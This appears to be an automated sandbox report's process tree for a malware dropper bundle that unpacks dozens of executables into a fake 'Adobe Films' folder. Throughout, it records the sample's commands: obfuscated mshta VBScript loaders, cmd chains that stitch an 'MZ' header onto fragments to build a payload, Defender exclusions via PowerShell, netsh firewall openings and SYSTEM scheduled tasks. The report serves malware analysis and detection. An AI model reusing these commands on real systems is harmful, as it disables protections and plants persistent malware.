  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16497809b6bd.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue160598ce8b05.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2720

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16497809b6bd.exe
Tue16497809b6bd.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3204
- C:\Users\Admin\Pictures\Adobe Films\bg_ugflVLgnyjdYexFwscoBP.exe
  "C:\Users\Admin\Pictures\Adobe Films\bg_ugflVLgnyjdYexFwscoBP.exe"
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\Users\Admin\Pictures\Adobe Films\MgizT9j68bTrUhE8vbFwjxRi.exe
  "C:\Users\Admin\Pictures\Adobe Films\MgizT9j68bTrUhE8vbFwjxRi.exe"
  2⤵
  - Executes dropped EXE
  PID:5600
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 296
    3⤵
    - Program crash
    PID:6092
- C:\Users\Admin\Pictures\Adobe Films\3eluNx1mt7j4BZpZ1U0qpptt.exe
  "C:\Users\Admin\Pictures\Adobe Films\3eluNx1mt7j4BZpZ1U0qpptt.exe"
  2⤵
  - Executes dropped EXE
  PID:5720
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 292
    3⤵
    - Program crash
    PID:976
- C:\Users\Admin\Pictures\Adobe Films\XKpP1q8iPJVAjqogv7ILKaft.exe
  "C:\Users\Admin\Pictures\Adobe Films\XKpP1q8iPJVAjqogv7ILKaft.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5672
- C:\Users\Admin\Pictures\Adobe Films\QwOBJYTdYE3XjXInE_VvxlBs.exe
  "C:\Users\Admin\Pictures\Adobe Films\QwOBJYTdYE3XjXInE_VvxlBs.exe"
  2⤵
  - Executes dropped EXE
  PID:5648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 228
    3⤵
    - Program crash
    PID:2608
- C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe
  "C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"
  2⤵
  - Executes dropped EXE
  PID:5784
- - C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe
    "C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"
    3⤵
    PID:1560
- C:\Users\Admin\Pictures\Adobe Films\07yTnXbxqaDTuklt6GljNxGL.exe
  "C:\Users\Admin\Pictures\Adobe Films\07yTnXbxqaDTuklt6GljNxGL.exe"
  2⤵
  - Executes dropped EXE
  PID:5808
- C:\Users\Admin\Pictures\Adobe Films\8KowEmYAHlW3pmz2nDd7ZaO1.exe
  "C:\Users\Admin\Pictures\Adobe Films\8KowEmYAHlW3pmz2nDd7ZaO1.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  PID:5776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5584
- C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe
  "C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"
  2⤵
  - Executes dropped EXE
  PID:5912
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
    3⤵
    PID:5980
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe" ) do taskkill -im "%~NxK" -F
      4⤵
      PID:6120
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "ezLMa4B4NXobtlOIKECpsSEn.exe" -F
        5⤵
        Kills process with taskkill
        
        PID:1588
    - - C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        5⤵
        
        PID:1604
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        6⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        7⤵
        
        PID:4784
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
        6⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
        7⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
        8⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        8⤵
        
        PID:904
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y .\N3V4H8H.SXY
        8⤵
        
        PID:1456
- C:\Users\Admin\Pictures\Adobe Films\9dSxL26zom9nRGj4S4rDilqe.exe
  "C:\Users\Admin\Pictures\Adobe Films\9dSxL26zom9nRGj4S4rDilqe.exe"
  2⤵
  PID:5284
- C:\Users\Admin\Pictures\Adobe Films\HaFItDQfZWeGlrCdh4kFMt_6.exe
  "C:\Users\Admin\Pictures\Adobe Films\HaFItDQfZWeGlrCdh4kFMt_6.exe"
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 300
    3⤵
    - Program crash
    PID:6052
- C:\Users\Admin\Pictures\Adobe Films\pZ5q56NQj2GGYaLgGyiYKxts.exe
  "C:\Users\Admin\Pictures\Adobe Films\pZ5q56NQj2GGYaLgGyiYKxts.exe"
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 300
    3⤵
    - Program crash
    PID:2008
- C:\Users\Admin\Pictures\Adobe Films\gjjvU6R_viWIc1nqnJmEWNRa.exe
  "C:\Users\Admin\Pictures\Adobe Films\gjjvU6R_viWIc1nqnJmEWNRa.exe"
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 280
    3⤵
    - Program crash
    PID:3076
- C:\Users\Admin\Pictures\Adobe Films\cSZInNKlSzsbBmfI69OKmwXg.exe
  "C:\Users\Admin\Pictures\Adobe Films\cSZInNKlSzsbBmfI69OKmwXg.exe"
  2⤵
  PID:5372
- C:\Users\Admin\Pictures\Adobe Films\CThsTPW_sflx4Kq1AX4HaO3v.exe
  "C:\Users\Admin\Pictures\Adobe Films\CThsTPW_sflx4Kq1AX4HaO3v.exe"
  2⤵
  PID:5196
- - C:\Users\Admin\AppData\Roaming\8763962.exe
    "C:\Users\Admin\AppData\Roaming\8763962.exe"
    3⤵
    PID:1912
- - C:\Users\Admin\AppData\Roaming\5891499.exe
    "C:\Users\Admin\AppData\Roaming\5891499.exe"
    3⤵
    PID:6068
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Roaming\5019877.exe
    "C:\Users\Admin\AppData\Roaming\5019877.exe"
    3⤵
    PID:2864
- - C:\Users\Admin\AppData\Roaming\1078971.exe
    "C:\Users\Admin\AppData\Roaming\1078971.exe"
    3⤵
    PID:5236
- - C:\Users\Admin\AppData\Roaming\520799.exe
    "C:\Users\Admin\AppData\Roaming\520799.exe"
    3⤵
    PID:5908
- - C:\Users\Admin\AppData\Roaming\4098947.exe
    "C:\Users\Admin\AppData\Roaming\4098947.exe"
    3⤵
    PID:4640
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\4098947.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\4098947.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\4098947.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\4098947.exe" ) do taskkill /F /Im "%~Nxk"
        5⤵
        
        PID:6048
      - C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
        
        kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
        6⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
        7⤵
        
        PID:856
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
        8⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
        7⤵
        
        PID:6800
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
        8⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
        9⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        9⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\control.exe
        
        control .\GKq1GTV.ZnM
        9⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
        10⤵
        
        PID:5496
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /Im "4098947.exe"
        6⤵
        Loads dropped DLL
        Kills process with taskkill
        
        PID:5124
- - C:\Users\Admin\AppData\Roaming\373783.exe
    "C:\Users\Admin\AppData\Roaming\373783.exe"
    3⤵
    PID:5028
- C:\Users\Admin\Pictures\Adobe Films\E4R79LhS_MmimlyrHIGdKU2M.exe
  "C:\Users\Admin\Pictures\Adobe Films\E4R79LhS_MmimlyrHIGdKU2M.exe"
  2⤵
  PID:5048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5984
- - C:\Users\Admin\Documents\OwanO0eJ8QmVp3i6Ghi6D7vc.exe
    "C:\Users\Admin\Documents\OwanO0eJ8QmVp3i6Ghi6D7vc.exe"
    3⤵
    PID:6128
  - - C:\Users\Admin\Pictures\Adobe Films\N8p4ZgMLFVX0Un4r9ujtoi9X.exe
      "C:\Users\Admin\Pictures\Adobe Films\N8p4ZgMLFVX0Un4r9ujtoi9X.exe"
      4⤵
      PID:5376
  - - C:\Users\Admin\Pictures\Adobe Films\s_bdn_qB2Ya36YzceiUp6bu9.exe
      "C:\Users\Admin\Pictures\Adobe Films\s_bdn_qB2Ya36YzceiUp6bu9.exe"
      4⤵
      PID:4488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 300
        5⤵
        Program crash
        
        PID:7008
  - - C:\Users\Admin\Pictures\Adobe Films\AWWAyU6XwqoPjXTH30K6qRzo.exe
      "C:\Users\Admin\Pictures\Adobe Films\AWWAyU6XwqoPjXTH30K6qRzo.exe"
      4⤵
      PID:4032
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1760
        5⤵
        Program crash
        
        PID:7056
  - - C:\Users\Admin\Pictures\Adobe Films\7_cJWtvuRAq9CI2uGLE5O324.exe
      "C:\Users\Admin\Pictures\Adobe Films\7_cJWtvuRAq9CI2uGLE5O324.exe"
      4⤵
      PID:1904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 300
        5⤵
        Program crash
        
        PID:7128
  - - C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe
      "C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"
      4⤵
      PID:1188
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        5⤵
        
        PID:4360
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe" ) do taskkill -f -iM "%~NxM"
        6⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"
        7⤵
        Kills process with taskkill
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        7⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:856
  - - C:\Users\Admin\Pictures\Adobe Films\IG5frkHi5RGsSZrcxdVx9F83.exe
      "C:\Users\Admin\Pictures\Adobe Films\IG5frkHi5RGsSZrcxdVx9F83.exe"
      4⤵
      PID:2716
  - - C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe
      "C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe"
      4⤵
      PID:3940
    - - C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe" -u
        5⤵
        
        PID:6968
  - - C:\Users\Admin\Pictures\Adobe Films\KN7omBZKyBAtLlFJ6MebZ_Z4.exe
      "C:\Users\Admin\Pictures\Adobe Films\KN7omBZKyBAtLlFJ6MebZ_Z4.exe"
      4⤵
      PID:6068
  - - C:\Users\Admin\Pictures\Adobe Films\VuoZjZPqTt4XuojZoc0PPvnn.exe
      "C:\Users\Admin\Pictures\Adobe Films\VuoZjZPqTt4XuojZoc0PPvnn.exe"
      4⤵
      PID:6124
    - - C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        5⤵
        
        PID:6576
  - - C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe
      "C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe"
      4⤵
      PID:6412
    - - C:\Users\Admin\AppData\Local\Temp\is-M61C0.tmp\y_KHMQ6HXV5SCeXDZtEeWopd.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M61C0.tmp\y_KHMQ6HXV5SCeXDZtEeWopd.tmp" /SL5="$402A6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\y_KHMQ6HXV5SCeXDZtEeWopd.exe"
        5⤵
        
        PID:6616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3308
- C:\Users\Admin\Pictures\Adobe Films\nGnLmAuo3H0EjiKQyZVWy7ga.exe
  "C:\Users\Admin\Pictures\Adobe Films\nGnLmAuo3H0EjiKQyZVWy7ga.exe"
  2⤵
  PID:5344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:1380
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:2112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:4632
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:5260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
      4⤵
      PID:5944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
      4⤵
      PID:6500
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:6756
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:6596
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:4488
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:5432
- C:\Users\Admin\Pictures\Adobe Films\OBenNt98aBYk9GwdIWcathF6.exe
  "C:\Users\Admin\Pictures\Adobe Films\OBenNt98aBYk9GwdIWcathF6.exe"
  2⤵
  PID:5408
- C:\Users\Admin\Pictures\Adobe Films\njFI1bLvpSoXabAXzERBXTer.exe
  "C:\Users\Admin\Pictures\Adobe Films\njFI1bLvpSoXabAXzERBXTer.exe"
  2⤵
  PID:3076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 292
    3⤵
    - Program crash
    PID:4652
- C:\Users\Admin\Pictures\Adobe Films\6K24cV4WI0TNfxSEwt53e0Iw.exe
  "C:\Users\Admin\Pictures\Adobe Films\6K24cV4WI0TNfxSEwt53e0Iw.exe"
  2⤵
  PID:4968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 296
    3⤵
    - Program crash
    PID:5652
- C:\Users\Admin\Pictures\Adobe Films\qF87haFpLC4xpGuujQuU7dvh.exe
  "C:\Users\Admin\Pictures\Adobe Films\qF87haFpLC4xpGuujQuU7dvh.exe"
  2⤵
  PID:5128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3312
- C:\Users\Admin\Pictures\Adobe Films\i4JGM3lfyYqMv0FV3edqzMRF.exe
  "C:\Users\Admin\Pictures\Adobe Films\i4JGM3lfyYqMv0FV3edqzMRF.exe"
  2⤵
  PID:5156
- C:\Users\Admin\Pictures\Adobe Films\yRrhQ_qNjycivqJ0uFMNTt_2.exe
  "C:\Users\Admin\Pictures\Adobe Films\yRrhQ_qNjycivqJ0uFMNTt_2.exe"
  2⤵
  PID:5192
- C:\Users\Admin\Pictures\Adobe Films\uADyxRpxb732ksRdQzrNr2uW.exe
  "C:\Users\Admin\Pictures\Adobe Films\uADyxRpxb732ksRdQzrNr2uW.exe"
  2⤵
  PID:5404
- - C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
    3⤵
    PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3392 -ip 3392
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2472

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe" /SILENT
1⤵
- Executes dropped EXE
PID:1308
- C:\Users\Admin\AppData\Local\Temp\is-1FTLK.tmp\Tue16937a015b8e.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-1FTLK.tmp\Tue16937a015b8e.tmp" /SL5="$90082,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe" /SILENT
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:932

C:\Users\Admin\AppData\Local\Temp\is-FVQ8H.tmp\Tue16937a015b8e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FVQ8H.tmp\Tue16937a015b8e.tmp" /SL5="$80082,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe"
1⤵
PID:2400

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1647cedf7bf133.exe
Tue1647cedf7bf133.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1604aa7d34a61a5b.exe
Tue1604aa7d34a61a5b.exe
1⤵
- Executes dropped EXE
PID:2284

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue162f02d7b75a1d.exe
Tue162f02d7b75a1d.exe
1⤵
- Executes dropped EXE
PID:3036
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 296
  2⤵
  - Program crash
  PID:5260

C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue160598ce8b05.exe
Tue160598ce8b05.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3324
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 456
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5124 -ip 5124
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3192 -ip 3192
1⤵
PID:5208

C:\Windows\SysWOW64\cmd.exe
